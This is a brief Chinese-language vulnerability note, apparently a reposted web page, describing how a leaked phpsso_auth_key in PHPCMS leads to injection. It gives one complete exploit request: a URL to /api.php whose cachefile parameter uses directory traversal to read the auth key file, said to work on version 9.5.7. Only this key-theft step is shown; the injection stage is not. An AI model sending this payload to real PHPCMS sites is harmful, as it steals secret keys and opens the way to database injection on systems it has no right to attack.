PHPCMS phpsso_auth_key泄露導致注入 測試環境9.6.0版本,其他版本未具體測試

  獲取key   通過文件包含漏洞讀取phpsso_auth_key (9.5.7中招,v9.6.0沒有此漏洞): /api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\
相關文章
相關標籤/搜索